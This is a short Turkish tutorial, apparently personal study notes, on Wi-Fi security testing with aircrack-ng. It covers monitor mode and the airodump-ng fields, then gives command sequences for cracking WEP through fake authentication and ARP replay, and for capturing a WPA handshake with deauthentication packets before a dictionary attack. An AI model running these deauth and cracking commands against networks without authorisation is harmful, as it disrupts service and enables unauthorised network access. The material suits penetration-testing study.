Kablosuz ağ güvenliği için eğer donanım monitör modunu desteklemiyorsa harici
bir ağ kartına ihtiyaç vardır.

Donanımı dinleme moduna almak gerekiyor.
```
airmon-ng start wlan0 # wlan0 --> wlan0mon
```

Etraftaki sinyalleri görmek için airodump-ng kullanılır.

```
airodump-ng wlan0mon
```

Donanımı dinleme modundan çıkarmak için.

```
airmon-ng stop wlan0 # wlan0mon --> wlan0
```

---

**BSSID:** Kablosuz kartının fiziki mac adresi

**PWR:** Yayının sinyal gücü

**Beacon:** Kablosuz yönetimi için kullanılan çeşitli yönetim paketlerinin
sayısı

**Data:** Beacon harici geri kalan paketlerin sayısı

**CH:** Hangi kanalda yayın yaptığını gösterir

**ENC:** Şifreleme yöntemi

**CIPHER:** Şifreleme türü. CCMP -> AES

**AUTH:** Önceden paylaşımlı anahtar(PSK), MGT veya OPEN gibi kimlik doğrulama
yöntemini gösterir

**ESSID:** Kablosuz yayının ismi

**[!] airodump-ng -a parametresiyle sadece bağlı olan clientler
gösterilebilir**

---

**WEP**

Üst taraftaki tablodan bu bilgiler elde edildikten sonra alt taraftaki tablodan
da kablosuz ağa bağlanmış veya bağlanmaya çalışan diğer cihazları görebiliriz.

Tek bir erişim noktasını dinlemek için kanal, mac adresi vermek yeterliyken
daha sonra şifreyi bulabilmek için -w parametresiyle trafiği kayıt edebiliriz. 

```
airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
```

Alınan paketlerin sayısını arttırmak için sahte bir oturumla arp paketlerini kullanarak şansımızı arttırabiliriz.
```
aireplay-ng --fakeauth 1 wlp1s0mon -a #bssid
aireplay-ng --arpreplay wlp1s0mon -b #bssid
```

Yeterli pakete ulaşılması durumunda aircrack-ng kullanılarak kırılabilir.
```
aircrack-ng pcap
```

---

**WPA**

```
airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
```


Handshake yakalamak için deauth paketi gönderilebilir.
```
aireplay-ng -0 100 -a #AccessPoint -c #Client wlan0mon
```

Dinlemeye başladıktan sonra **WPA HANDSHAKE** yakalandığında dinlemeyi bırakıp
oluşturulan pcap dosyasını aircrack ile sözlük saldırısı kullanılarak
kırılabilir.
